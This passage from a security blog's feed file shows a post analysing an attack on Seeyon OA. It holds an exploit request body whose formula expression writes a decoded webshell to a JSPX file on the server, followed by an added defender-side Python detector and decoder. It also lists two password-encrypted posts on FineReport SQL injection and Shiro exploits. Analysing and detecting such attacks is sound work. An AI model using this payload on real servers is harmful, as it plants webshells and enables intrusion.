%03L%C2%A6%C3%A4%C2%ABu%C3%BD%C2%8E%C2%AD%16%C2%83M%7DW%12%C3%80%C3%93%15.%C3%8D%C3%A0b%0F%C2%90%C3%A2%C2%BD%22%C3%A0%08jyx%C2%B9W%C3%84%C2%B9%190%C2%90w%11Uxc%1D%C2%BCw%C2%AA%C3%B2%C2%BB%C2%88%C3%ABk%C2%81%C3%AB%C2%87%22%C3%AC%C2%8D%60Owl%C2%B8%C2%9F%2C%C3%97%C3%869%C3%A7%C3%BA%C3%BB%C2%BD%C3%9C%C3%B3z%C2%BF%C2%AB%C3%8Eqbq%0B%C3%BE%C3%80%C2%B3%03r%26%C3%83%C3%AF%0B%C3%B2%7Cf%C3%B4%C3%A4%C3%BD%C3%B8q%3E%C2%BC%C3%AAeE%C3%BC%10%05%C2%99%C3%BD%C3%80%C2%8C%C3%A4%C3%A9%C3%97%C3%A1%C3%84%C2%B5%13%C3%87%7D%C3%A99%C3%8Do%7Dtu%7B%C3%90%C2%87%C3%ABS%C2%AA%C3%BA%C2%B5%C3%A6O%C3%BDn%C3%BD%C3%A7Cc%C3%B0%C2%A1%C3%BEe%C2%8A%C3%A7g0P%1Dj%7D%C3%BC%7C%C2%A7%C2%AC%C3%99%7F%7C%C3%AF%1Ezu%C2%8F%C3%8F%1E%C2%AA%3F%28%C3%BE%C3%905%C3%BE%C3%96X%1B%25%C2%99%0B%C2%8E%C3%BD%C3%B9%07%3E%C3%9E%C2%83%0B%C3%87%7D%C3%AEe%C3%B9%26%0F%C3%AC%C3%9E%C3%A1p%C3%B8%C3%B0%C3%B1%C3%97%C3%BD%C2%9F%C2%9F%7B%C3%B7%C3%B7%C2%9F%7B%C2%BF%C3%B0o%C3%BER%C2%B8%C3%B7%C3%BF%C3%BE%0F%C2%A7%C3%92%C3%BC%C2%90.%14%00%00"</span>);</span><br><span class="line"></span><br><span class="line">$s = iconv(<span class="string">"UTF-8"</span>,<span class="string">"latin1"</span>,$s);</span><br><span class="line">$s = gzdecode($s);</span><br><span class="line">echo $s;</span><br><span class="line">?></span><br></pre></td></tr></table></figure>
<h4 id="源代码"><a href="#源代码" class="headerlink" title="源代码"></a>Source code</h4><figure class="highlight haxe"><table><tr><td class="code"><pre><span class="line">[{<span class="string">'formulaType'</span>: <span class="type">1</span>, <span class="string">'formulaName'</span>: <span class="type"></span>'test<span class="string">', '</span>formulaExpression<span class="string">': '</span><span class="keyword">String</span> path = <span class="string">"../webapps/seeyon/"</span>; java.io.PrintWriter printWriter2 = <span class="keyword">new</span> <span class="type">java</span>.io.PrintWriter(path+<span class="string">"SeeyonUpdate.jspx"</span>); <span class="keyword">String</span> shell = <span class="string">"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"</span>; sun.misc.BASE64Decoder decoder = <span class="keyword">new</span> <span class="type">sun</span>.misc.BASE64Decoder(); <span class="keyword">String</span> decodeString = <span class="keyword">new</span> <span class="type">String</span>(decoder.decodeBuffer(shell),<span class="string">"UTF-8"</span>); printWriter2.println(decodeString); printWriter2.close();};test();def <span class="keyword">static</span> xxx(){<span class="string">'}, '</span><span class="string">', {}, '</span><span class="literal">true</span><span class="string">']</span></span><br></pre></td></tr></table></figure>
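<p>A defender-side companion to the display filters in the Overview and to the PHP decoder above, added here as an example and not part of the original post. It replays the path normalisation Tomcat applies to a segment such as <code>..;</code> (path parameters after <code>;</code> are stripped, then <code>..</code> is resolved), which is why a front-end rule that matches on the raw path sees a different URI from the servlet that finally handles the request; it flags the watched URI from the post's filter in constructed access-log lines; and it undoes the percent-encoded gzip <code>arguments</code> wrapping in Python exactly as the PHP snippet does (urldecode, UTF-8 back to raw bytes via latin-1, gunzip) so the formula expression can be inspected. The log line layout, the sample request bodies and the token list checked in the decoded expression are constructed assumptions.</p>

```python
import gzip
import json
import re
import urllib.parse

# Assumed combined-log-style line layout (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# URI taken from the post's display filter.
WATCH_URIS = {"/seeyon/SeeyonUpdate1.jspx"}

# Tokens to flag inside a decoded formulaExpression; a detection list assumed
# for this example, drawn from the class names and file extension in the post.
SUSPICIOUS_TOKENS = ("java.io.", "sun.misc.", ".jspx")


def tomcat_normalize(path: str) -> str:
    """Approximate the path Tomcat dispatches: drop ';...' path parameters
    from every segment, then resolve '.' and '..' segments."""
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]          # '..;' becomes '..'
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    result = "/" + "/".join(out)
    if path.endswith("/") and out:
        result += "/"
    return result


def inspect_request(target: str) -> list:
    """Reasons a request-target matches the traffic pattern described in the post."""
    reasons = []
    path, _, query = target.partition("?")
    if ";" in path:
        reasons.append("';' path parameter inside a URI segment")
    effective = tomcat_normalize(path)
    if effective != path:
        reasons.append(f"raw path {path} is dispatched as {effective}")
    params = urllib.parse.parse_qs(query)
    if params.get("managerName") == ["formulaManager"] and params.get("requestCompress") == ["gzip"]:
        reasons.append("gzip-compressed formulaManager call; decode the body")
    if effective in WATCH_URIS:
        reasons.append(f"request for watched URI {effective}")
    return reasons


def scan_log(text: str) -> list:
    """(source, target, reasons) for every log line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reasons = inspect_request(m["target"])
            if reasons:
                hits.append((m["src"], m["target"], reasons))
    return hits


def decode_arguments(body: str) -> str:
    """Undo the wrapping the post's PHP snippet reverses: percent-decode the
    form body, map the UTF-8 text back to raw bytes via latin-1, then gunzip."""
    args = urllib.parse.parse_qs(body).get("arguments", [""])[0]
    return gzip.decompress(args.encode("latin-1")).decode("utf-8")


def suspicious_tokens(expression: str) -> list:
    """Tokens from SUSPICIOUS_TOKENS present in a decoded expression."""
    return [t for t in SUSPICIOUS_TOKENS if t in expression]


def build_sample_body(expression: str) -> str:
    """Constructed request body with the same shape as the post's payload."""
    formula = [{"formulaType": 1, "formulaName": "test", "formulaExpression": expression}]
    packed = gzip.compress(json.dumps(formula).encode("utf-8")).decode("latin-1")
    return "managerMethod=validate&arguments=" + urllib.parse.quote(packed, safe="")


# Constructed access-log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.1 - - [16/Sep/2020:08:56:43 +0000] "POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1" 500 51
10.0.0.1 - - [16/Sep/2020:08:51:48 +0000] "GET /seeyon/SeeyonUpdate1.jspx HTTP/1.1" 200 508
10.0.0.2 - - [16/Sep/2020:09:00:00 +0000] "GET /seeyon/main.do HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for src, target, reasons in scan_log(SAMPLE_LOG):
        print(src, target, reasons)
    expr = decode_arguments(build_sample_body('new java.io.PrintWriter("x.jspx")'))
    print(expr, suspicious_tokens(expr))
```

<p>The useful output is the second reason on the first line: the raw path and the dispatched path differ, which is the condition a reverse proxy or WAF rule should alert on regardless of the specific application behind it. Decoding the compressed <code>arguments</code> field lets the same rule look at the expression that would reach <code>formulaManager</code> rather than at an opaque blob.</p>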
]]></content>
<tags>
<tag>JAVA</tag>
</tags>
</entry>
<entry>
<title>FanRuan FineReport official demo site SQL injection</title>
<url>/2020/09/13/%E5%B8%86%E8%BD%AFFineReport-%E5%AE%98%E7%BD%91DEMO-SQL%E6%B3%A8%E5%85%A5/</url>
<content><![CDATA[<div id="hexo-blog-encrypt" data-wpm="密码不正确,请重新输入!" data-whm="文章不能被校验, 不过您还是能看看解密后的内容!">
<div class="hbe-input-container">
<input type="password" id="hbePass" placeholder="" />
<label for="hbePass">This article is password-protected; please enter the password to view it.</label>
<div class="bottom-line"></div>
</div>
<script id="hbeData" type="hbeData" data-hmacdigest="80d8122d0073bf01ed9e6f19e29e423970e89a9f6a86d1e0a486bf0107c686f9">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</script>
</div>
<script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
<tags>
<tag>Vul</tag>
</tags>
</entry>
<entry>
<title>Shiro payload EXP extraction</title>
<url>/2020/09/12/Shiro-Payload-EXP%E6%8F%90%E5%8F%96/</url>
<content><![CDATA[<div id="hexo-blog-encrypt" data-wpm="密码不正确,请重新输入!" data-whm="文章不能被校验, 不过您还是能看看解密后的内容!">
<div class="hbe-input-container">
<input type="password" id="hbePass" placeholder="" />
<label for="hbePass">This article is password-protected; please enter the password to view it.</label>
<div class="bottom-line"></div>
</div>
<script id="hbeData" type="hbeData" data-hmacdigest="dbdc442b7830f9ea0e1ce20c1d12404b793f0445301226a2dc3b11bb27b4d137">a4f0bc7be899c0fecea1dd9bd53269b5ab4a6908059156f2cc012a04c842f3e59b0eeb701ecc6bb769d1155fcc257d084fa64353cafe38952b856cc3b16eb34dc5bb365996e0967bacc9f99393a0603a9d2cacc5b25505e08f7f7d49fde09a00f2154d17fc16b811f7a3af3b7068b5f83855cccc612e104a0e2802334003fd136e513c760e93b4c164055394d8015db06d4246414134b21927d82fa05f5280fc1463734b1b71cfbd27ac05e14a49f120368e11a0936482a2e1892541efc67ec5be3aa76747295ea46f2346c31c39dc5fc9fc8611d5595c1f3658686b9fd6616c7c8309544ab46aefd972eb04cf6a1768c850bc459a66d2542d4e3dd65805149f4144b7061e68d656a304354550aa4f5284d2470170a2d3ab1ed01d5b5b9630b788cff40987a113a96bec069a070e7703269d7c0c07399fb08bd930686f88695d27684faa63c7af28beeaa7f81c217fbf5497f71e7e834835da9b543d16aa8c630e48af1e426969ca503c97723663c09f6d8a2ec5a2c20a542ab19bded885500631cc10b0ac64ba95addc39aefc865399c441311931cba72ef144c416e763111b4ff56b9a430c9284943ddf227e05f3eb1640d2448436db09b06785f2626094dac7f536dc274af1988b75be91dfa626cc73ca55a15e0a99ad4442a5f0d473ba8acef963e76c2b04f6e299dd2b6c6fa07c6d8128ce1e63fc8832ab0efcba8a0feb8587a8faad05dc0d7a63332cce17847cb751ecb874a838c8f4890de13dc23fa747649aee33173c82cfc0a3de2f3c0137a056978929c37248045e85a6ad62cd0b98823829aa0ba787f80372b30afae177771904a60e18c23aec2115d0dda02a500c09000f99436a3baa885f1d4b925ba71aa10c2b3a5379698bdcb04ce22ba72f9800794f640cce3872a8da6747ca38dfaba679fd3ba1eba4ee88df6031b3a46dff828944c61b284e118584faf30dc0f85104d370986802b43983deda49c04a4dd1d82bd60cc7bbe54c868c4c1538b03001fdfbf23556b1072017ba23a02ba4c2b4e939ce12ba8582b9fe554b6e9b3b49711241eba540069a351cdc8166cec0fe76384ea6616c10b340412532ab9b8a41d9b4572edf604f75c2626212da0ed049ccb940180346c23e9d8714a1b2de49527aa73a8279189d56a39deff85c744ad6791c9b09242f7b3962c98a80f96da8fa388089d9dc1ee83e181695d0ef6235dfdbca5756a40e408bb4c85da43c792496092206b0cc1dc69423dacb8687d8f047beeb650389c5817e81dccc506393097bb58067e563833e52f58423149fc80524527c353bb0bf72328de49d919
053a0e151f36b17b8c5e558790ff4fa3564094c6ad60046bce1259b73e6323b929c76f11b8e48668f55f05c4cea4add92ec47662a8c5aba0408262d0c32bc7cf400c14f4c70bac14a7d45ac5eec3d9b12e5e31d654cd42b595a15f42bfba406b090d9a741c81aa9a67a5af23939c80656b14882b599693cab4d30cd67574cea2dbff90b726f17efd3aeb33e03833bacc53aa19de42fd17cb4b0354b42659299d803eecfef4faf2ceca91ee8a0d56c00a46243af622d044d6b60cb81d50e9ae78b11f1fc15084188866fbe9d9001594ca42f549bda6c62057e6f4ebd72958a3ff3b538f8374cfaab91e83a586738269ae47b867f63210bfc00ad4e9237e295a495cad59b0c972094607fe119aa7dcb0ff08da4e9819428e6af3749bc833d8d51eaee5d99ab6cc8cb011581968c96df12638f592e14462763c4b13071e24f9c0e90ea208c51479ff00cebe16d90b8cab59631933a73a9e7eb9197f891372cf7fc1cce4fbf2d821e70323b7bff517fcd8ac396ebbc3a67761202ac29ff20c87b25daa5bf9a58e061621bdbdd3f1ad7edf6816b58e19232c655b0e19f4e3bbe2b681192e7e525b38a743e4298b71ca843eafc67d0edb307d356b12b53b4997f0eb1f484eca5abb6f4f50c6c5cc0407be2ba86d2b4218f8be4270185b30c650e557538381c26c9c93270a4399c8126953a74db51536003882a200a5f950f6f73d27d3e8d76a8097362667b66a49a2af1f719c9150f9c8a418dc06c107362d54d5cf0e03be9b37585d0c81a2a77d51cddd7def0a79ac9d84af280e7ae76bd1c05e8ecb44e31db5c7c7f858adac7b59f190b36536e6a83926f809a4a249d7cab8c8cb572e24423315d95094ea940a0e28e5cc66b6b2f77a6668b0b29d34bdd272e3e5ab088a124bf6ba512df22e7c3a2d13e28526ad4e24824a58c1950af9352b36a04ca1afe77156be2b6f232d51658fed36ab229fbccd9362e7b3ea4045cf536c027d13d21cd1638d90103ddff7cad1c3f0de65505c9c9c3842897baf5f9c495bed34d67a9f20913fc6e80d35800a6f1ed9f823566916fe556500e616b23a29c99930d4df126e075e3a52b3e98751eea304e9a8b9c5155163942c575a048a4bf939977936323dd27ae349da84de20c1b5f3e147706a5a7dd0815b0b02121db9045d1216cf4685426380b4ac4a9b2408be6bf7a0968fba6515d40678a113bd315156f070aabe7eca7cb7771b2b718b03811487c8008a92350d7a4b96927f0a8110e3873ca9a7d3be54d607473ba1ba562ba0b1fe799b7cc7727cc0b196845452eb00edb914d6834f5d9870ac31ba90c2177a080066020e1e5782fe0f7efe8065b39eddda22089dd67002d0cba838c108c856ea81845da698908ec4484f10aac10a25ede5c11996eec89590
cd2152bbb61e51c7a0d71ed65813dba9e6799b088944e84fe2f11296f09f35063a5ce3605436c83a07c402413b78dbacb381283f0abbadeb9e4e6c02a97b4b24512296f7fcb275d3233005861bdf6d500252e79d4d74a138b11a91c3cedc72816f96849fdf5dfcf0cc91671b6a6837339154deef6dc9bd866d8f4ce329d134e2d9253b9af8142df26e3df3a36fce0f2799b683039e9645339147d961fee35e3c0603b34f0102abfbaf7f709cd84cb3b20ab3e80dea512cf73f07077c91dbadb97d9dbd658cab8a2d1301d78117fab62ecad0c4e892f7abdb7ce7d3190dfa1d42430f2c71153464579b29e6e323c6083c96dbd08f06884672b10595f49f74d018989ad9267d5fa05a1446e4e21ca4d8602ca5cc062a2ab6d2b5bda2d7cdc812f230674c1eafebfb1f09031c98fddd3d13058ea16cf1eee5c5e0a4f029919ed9064cb0022e7c997ffc7d8f6e0a636a9a373db94c49e84b3023c5902dfe46fc636912f2213cf57f494a0dce8b73fa2be0f2c0766da7000619108a18c794c3dccb652adaae78ee0800280eb93e7528cfa5dfa58345986ae98140747adccdc92e75d2185bf58e737aab7e878d9a37e4713c6ef5fb1a8f51189d471ec369deef6157340c10940778b71ee3cf7fd43a4e6c256fdc6aa4f13920e494b44c2ba7c95891422bee1e4694d76b2bf30002a37dadaf308406df3bf4c46cc8d64cd738afb88f1a85b15a5821dab15985c7adb3414a6e528cfd82057cee7e2b342bbd39d0ab97dbd53825379543e898ac7af6623041ed00aac35454715afe8d2cd0d0f6d4e1b513afee7d109511b6acfeb452d12cbbae52a2ea70fd285e0a6949d0c85f71292db39ddab29862dadc7141d8da89b269e006f3cd623b0f1c9ad483e31727bb0627ee3741763dd1f93ee7f58707a0d6c5f3fa97cc2c49c9e6059b34c82e76a60498454fc60396204d29243beeec73e3f563522cc3618eb19016a6b785b921525a1f73a616b6c694be0e1750773506ced8d1ba747c63317c8f84af7d48128fb74097cac7ddb53c29f79a615ed91d964d39aae96001d92207e689405408488dce900894fc03336bf40fb60e7a87c417055c08448be5324c05233ab20a3dabb129e9c948c8500f6351166405535e030683c6b7a496a884c612bc2c482b58b91577a61e3f33c389742ba028f3825fc11679207b59a6d641df9349cac2628de3774c27770b6ed30837af3e33f27930c66fdc48a61ea46b2f58e48118faf6e3aaa299536f4e16d55ea7dc3108a8aef2e83f3d237a094e84d6d8a1d1187e7ff5b50ed871340b646ba9aa22c63c09ba1407a8e3457f3dd7ca1151234ea886a67f61dca6aa8f309bdd6f8ebb85893aa5b796b508735bc5f0fc48f64f5fe01e4517fc2f671606e89200cadb7c48f53d
710813b9f1de7b5a6654758fc7e3243b588beec5737566f5799707f5f245f068d9ef093e6383034fc1cf617b6a483d8c89c951346ca3a32db90c979960e3babe2341c3a0b74ce53d3ff61aa8f47975b5a08d34d55585d351ab2b13abe99e2bffde730cdad6e6cf256c2f19d0b946fbf9a45294bc8af122901fb21defd5f4611962bdffd52a0b64355f37229d49aace6e8b2ad0ec87c0f45f430efc1db3f8052a33b5aa720ea4761f8c642f58c0324ea1205dd0ecac488ed4dd30c0c1ba367a1c67859a17660fe071f7206e925f46e9e4c7387d7d70cb71e7e568e062f6659174d680887f97a24ccaef9adca1fb7e3ba3da32e6381d7e88f209c5f124b5076c89611f634fa0c3e0673d9785c3e9f53281eb75040328d09894c7ee294bf2324ac68b0289cf8f01c368215ddfedb5aa1aed569a7fc5401bf2d5b5cb350ccc58539e86952ea22ee1c778f5f89177ae9b5619de66105fb657c7e1d126d98acb39bf17027426e9a888b43bf2111cc58cc4ac15242543c2293410e0b4825044924b66cfee3a1ecb49fca484f7e78a4960d5d184fd9408fd903712e89526840e017038b22646cf022d2fe1474238a6620a67f04e81158b1ab8c07bfd2f8907507780635fd7eecd93c63434a24c177219ca506976cfa03c637ae1cb84f71c0bfa5a013d2dfd6d648dee09326443d03031e56995496addf13e4c897c358a52e9c4c9aa2202e055d437d9e792221847c53ad1fd362e919b5ba4b93da3eef3646e371e5c2d2fcb005237c57828bc3e68858f3e5ce02f45afab0175cf1a72e83da361503afd6e194507e921d454ebda8ff3b1930be1c16b0a25a4b3002d11ca5cbb1d83cbd27416ee4fc8b45aa5c7e47d76100b2be1ec725e9c1c844c4229aa90960c54d1cee1fbfc73847406c2d1ed71f94e9da4a936de755e3e8be190824ff25eb5db2bc19d6544ac4f77b205dc80a5613ba18d9c5ac002f631763b6a3c2429c99554af07f64081748e779a0be4c311c10ae7d4b33b4e42391f3889d1b872f4ade0ba5f5514a2d8901a670f7e3f8947367101792fd2f8bfdf86d06ecaa0e466f6d7d8b4cc9297290db3c2bb381fe5f1c1eb2a2163fb930bfb33c52b94f5bbea7e68ccdea9bfb935c8c4ebe46a34b837dadfb8ccfd2bef05a86eb0ac46c6360335ecc30ec28d437dd26df48d2dce966bd5f8acfaad704a5340fe24faebf63d29ea66b1ab5715c3e58322d1fb43f8ce843818cde67a11086bdd844933edc5cda6e58cf3bd5de33c45cc0acbfe9fbe17ab8fbfe8c212a413e5326665e9fa2fec361fc660ec56a276a4b192c09fc6535b30be2598d33a7860ab3305bb18ef5a4104db0589faf0ca2310769a97a05d9a8b94b7f144605cbe1c840bc4a64d8ac1ca63e60d40b9e4c7b20309253b8a6463
6a3c94e03c64c09270ead32a77a7fdb478f331478486320251c0ded5bd7eabc3758b1a395b427da98d359ee4dc09e8f7f98e97dcaeba3444e35bbee215f4d27fa13d1e653598ad097de2c0a85206ec8546e2a3a4b15e7d45255f0e78ed138763b92e6093bc3bf91a0ce19cadbaa64eb526be2be4a1afca76a3ab1ecf3d725852f95b253a7e430a56f56bcc06bda4a0ec0afa1a242da0c1a3e68d3c451c1078bd63967a40b821e261bfef5a79ce1ea1f9ab4f3636684c47b0a78fb23f867213b6ee3b035b328e319d64e735b602c019282c123365b2a6708989257b726d69d99d8f5a4367a76e72f9f0a6feac28118717107a14a7da52a6791ec150d0ee0eea656a82e4abe7a70f5db54c662e0350dff7d4af6e12889777253d21e4c517cf7ad927639f6b6974bdb6ecf934a7a3e387828b3d50f36a4a7f551bfb3bca0cede1db37f0c3be63f0e7196732cf6d023ac886eb4cd5df38922c93a735302c705d4466137e68d1c065c9714de02fd0aef2effb0d33c0beda336092a402158fe63266d245687d7f669781ecc6a57e3dd5d11b94fa14015ff9ae512608b9f9602698e9e9c9128910f7a3a9ea7cceb40cb83ba629cf113a045556a44ce58b8f6c5a8b71c479f199002a3c2d26ea9ca3ebf18f97c8cb07131aae5c3fc6e2f8dd4219fac3ea51a1ea915ef76f5225451d15665d0d578b90fcd1e1df5739bfc2ceae5ab68e7a86d43937f4df8b751d1f73dc1273f0405afd242f5abed2713203e91e02a76f0d7a7ceaa95a4dcb52b4db55ade07f96aab212e0294f0725793aee3f0329afebe60906c4e3461a9422f3bdac81e56f11e7c5588b97d14686066afd6949211832675881d9278f23afdde7d4bc49087ddfc3898b8e782d4de4b722bdcf8de22843eab442069ff231c81358696b6a36fc7f80a42689e88528046bfb32627e881132103bada6807382c1dfa60e6dc50eabbf94ad9a3d6738e4cd0c223d34d5e1fbee8bbf8db579197999141131bf8196b0972015bb7ba73d633e5776d3bd022100b0fecec000a65503f2a32468da5dade0d99da5bf3a24d0f6ebab8f70ce4c9aa1a68f7b79ccb58d77c497dd94fd75c01fd4f6dac1f1eb8e617e94dbb0076b0b0630d6f71c715da1c1ce9b610625f9921bf7fb7a52ebbd465a03c8bdf360d58ecad809341bd05bd32edbc8ed1fbc2578c2e4574d9064feda5cb46a317ef8c58c7fd58f9fd18061e54be943fe720f1d4883f703303d32035db3922c26e8e848804512344ef65e044320cca33e60b84cff5d32c303e97b7a865de2348c8504ce0780d2d6030b142a9f0aa1c42f147240eaff2cc8fe1a764a876fd64dcabba4cab33e77008ae6218bb0da8a54ad0f90c8624d13ea8593c8f8c0cae0f292fe00062f19e3bf714df31891861cdc
39162d3c2e81728b73c57306d05338d7ed3fff8730a4ce7087fe575555168072eed85f7720215718de17912f6b9b313e622c5fca63f8af6ab1cc884cfb41774489c16da46e14b0ac3222fc60b3d7a3d9056f88db2bfe33ec323602b10e0b559495eb75df2d58e2860fb02c324155802cf630e66212e20821011485ccedb5581946104c257d54a303447f2be09e35f7dcb8dae8e457243e8b2ebe5a3e41db75302a9b85a881ec8521173c2d17fe8e4db3cbca313488bde60445ab2752cbe82b8e0362282a7499cfbf232b5e62b70948313c0c26f05b24fae51c49737c11f16a59715706b9093e73cdfb7c262cb28740e5585fca6991de5e8be61eb3c5978de2f048fda271d944797b083bc7e81d129aab9c5c5be59913b10614e15568d4af4d7572e2935e27f70ec2eab184850f0bec1e617198be8a4caf8fdf7566d9fe2a9da353c583fcb447ca7a447686d048579a30e9d2afc9514b7e0680a01019ff98dbfef73d02c825eab4a0ae43c8e35ceff645d6afbce5ee32f83413f60e96abfb7dd16b27e16a89f116fd85e6066485afd77c0313ffd3bdfa6a6f071ec57d15d0c3b115d6932a26355001e450ff89b4c3b33fb55b22006a18af35396b059e5d867dc2afbee3b269a9c21a801862cbe340b37027a5523977552063e4cbbf1edb939352ca2ad4b9d80e2ca04b2b820a0d8592f89455b86c9ad635113c4c20e094801d7c7da12040cd3f2c6e1e70a4a99f4d057144b5b2719254ecdd5225310d05e0b32928a6a9efe407f329124c55b67797242a8562f1e52df05875062566afe1d26405121e39fa6e502b2e404a6f0c761cae6702dcfa2ffc619f29a7b8be00342c09b7ebb9730a36a3a522a7665768c0e1bfdd1d9c7a8903d763e7f33c9a0d5d3dd3b471b2516db84bce73c8bd999301428bec7a78dfea22c7bf328f054fe47adcaf5bcfdcb2cbbd1b7e564d255e5e45b92612d3d47c4d99f980017c88d9c42b764d706351fc794fcb4f27691176d34bade4509eb996ab43e028e67897057ede2821df4db9f23d52a8a32a3213997c1b8fd0d74cc4af5075bfea5e6f2b61fae2e66bb1645094a8d8089858a9b34fe32f39e64ce2cb1858669bfb24dfb6ad76107dadb75e764332c5654c38ec46fb637f9f67fa637721158e53fb0b1933b0276889ac7d3da357060cfa89adc09b2d9495270b32db8b77d472ba8e3e00dc926e3cae2967e1905c60253dc7373edf71fb4fb13e9d6df66a84a33a5a721023b3de407f07eb5c3c8be6ac8da4e58d29786acbd7847ddc90d75a9e63da200fa3dac38b37ca989bab7d5b799a61a388d114cd477ad80679a015a9b8e1474ae3d151d100003b4549ee99678fece27cb58127a10cfce0b839161a1650c38dd82a38e68a4e0268705670323c5e31c1ad
590f89596b28463f0045c85eff9ad2d1143c2f467737c93f9b2a9d46b5779c8803d56f1733fa13eb4bcf5506f293c34fea0a4ff746eafe02fc14a14810bdbe6aace4961e08db6a2f10045c32c5562e2219aac158f9e17032f71f15593cab26da297afe4fd4c342c0aebae450f5f0d352ea71e7861612833a9867019f5e1b45047130879ecf9d4065d3a668cebece4f10b79d2b1958d5f55a30e7b3be8c19b5da4338df14b3c220d21deaff48a74f338c50fd7a765b98da971904171689b5644cd9c638b34dd162dd1b1532fd587777826f8bae6177426b0cb106908c55048c623f5eaadc571e1c9082ac23e2de0beee31cd6821b022ee61fc9dc4deaf8789768dfdd0afd9aeb4d8f9053d3921a803a1fc4a4a01ad0d8945e8003adfc87ed561d9c7ba86e098ff58d9015a36a82a568568b2e166bd31c7e6cef44cead6eb26035e11de45cc00d1c1c563bed1ef1688953e6dc7f35f694646c86835c6f19e77c298a6b8580b7340cd5a56543928785e1b55aaab9a2b7f87a8dddf952ace6b92aff8358c301d40875db078557279d9529b7575aac8d934e87e7bd87af8a504268a1c48f80d2ad18a6798600d46973216e0bbb3423bf1dafd9e1c345d93c73c60e7efae35f992c6c7fc4888720fb14edcc06a9ac2db411aeaab93be3dd5d4252a62a7979b392b7c3990c9f78b3780d675634b46a69639e0cb88ac10982b8926eeb7a1d64869a835025e3f72a9b6576b047d4a12f6df963e241bba32088baeb7c23d6235a41fa5d2ee8dd8e853f7dc6e5a5cbfe7b195c2ec280f226ac5cd90c267d70627cc007398c1af8282d9d9dfbad583501f656726bb71bf8f0c86467f850536554bb2a07a07c588c8570c80a40edd3b4728a9c46f877042fc190fd71aa7cbc52a8de8d903895e1e92f5b62bccb8914e3660af2077a8c90d8a1fc925c72eca9d6c2a869e517bc47bbf55d1bab65fab1964dc8a3bdf530bf6352253f6d7ec0760a758857bb2dc776e61fd7285f69ad728cfed0748e33c5ea2456cdbbbe1bb83a9ed20896d8e6f8b2211eab8a61fcdfaf87a89a670c9edcd42207bb85cdbaaba0eec8a1c8ae4364920907f17fd412d00926b20ffa753e98572d17188216148445e9089afda82e58327d7ed644aea1439bb56fb5d4b69fa5433a7a6dfbb16d7ddff5525203df7362fbeec7bdb6690e60f9a111722994b5032d0dd5748b553b59d9b25ab1898c4506f2ced48d65fd1c3d85f35a3607a8a687dce0b291262e9bf2eeae0344ffea0e576783d98fcc38da3d7983a52d6865bc35a7ba15668bda54fc6bf74515c8a16881a3d8fbc949fb8c811e300dd27d9e9a858c6d60196125d2f7c400d571ceb33a5c56ff0dc880d0bdb8d39e9dc5cc249b0d2eac76232936ffe35e95b22d5cf674f0eec0
e9c5765bd66f00f943332e8e9302c95a78ac5a7ebb1025e07ceda45c67404ef4ebc5026e7153691d6c1131fd6621c34d398cc3fea8cf725b618834f6aee992a571d33beef5a8dc7078a3222cca1aa89978498327dfaa802b8e49210897b21d340c3f2628bfec4466015a4032b73b75e91f5a038a2bab85ceaf64aec42e17a7f36081f4aea1b92b10466083182fe9f809440b2ac5203fa09f8c1f505bbee1d1fea09007c5563514994e4899fef7af2157af2e95ce2e5670c082568eecf2dd8ea144b4cb90140a1d9a621fec7c299ccc465ac5628792639f341c60dee926f3c4e90622088508c83234cc76a1785bf289569750555faaf1a1db15327e6a901ddb46cd0625427d760bb6fb1d0da22a0e7fdc29989a8941d8efea44876ae6d49dd11f0289558ac2fa4b5792db49d7bb70ce5e2d736fbe6762039bf228e00ee6a0ed99826686ec822a413a40a60636886b9269b78bfce90b30aba8794f72f46303a02488dd46245813bf123205ef5de9c741ead3ed79923de7c3ce85db0dc4df68c368cb46ff3a481f322be241efcc6980e6ffaa3ffe064839a0ed6b943ea23c33cf6cec4855af83e442728d579231fbd714b0c7c70b5ae502750c4b55b499f0045ea44411add8964a9ae522cdf80c88bafbd73c2f949561ff6d3f5b230a28d9e0f170e08233a902c851e56147094ddeb6eb149ae3223f4c70f6047635f8018df0a43e9b8c261d6a75512ecd8edcc509737516b57fcd6a8ae76b686cfde3562d9eec29e9dc6bd80b2264996c971719a61a294f8b6d617148f3314ddadcab4c8d6dfd52ae1ff6d0665a21e5b4bee3b039c4a49d7545833b3c6db184992391ae8dc2c5e6603abc58f9096e25a6a46fc725b34a6cb3f33ecd700736c71052f87383499ed19e1bbb44347b8ad237f990b9ac7d2a697e58cc3fbe0eab9c87877a9169ea0042d06a57abf43fe16f08987cc2dcb8f441aac8c64365bbd52f9c13cf3321787ee50d877e51bbd8bba9f674191d9adec7cbb9fb856aa7dd85a8fc74d01071589753d507dd3f6e84a0893d27781f0919e41784ded817b0c894c00add40246ed4904e1a246d0d0e6da011bd590a4a7512bd738863c19ab855bf3e066d919b6b2c3b491dae616f332dc9b374f56e315f53523b71b2323220dbaed39f919f29fe0bac17e0ee3ea55df9441f5de6f775c98938efdb92a2bf209352e7490055e5700770eedceb63057cf8953d046f61b10ec6389acf90888c4db9f77e03171195cdbfc20ac91f652b673889fa15526bf6c4cf2ccca363618537b3e377901d669fb78d0e1f7824c8980c30d86e65fe3f9ec9fe0253746f3bd15bc6ac8550bb344691ef8f8a0686ffcde029310f7b3bf66431c6e7283c2c198b51e960421e9254b91dab063a130dadda6b45ba26
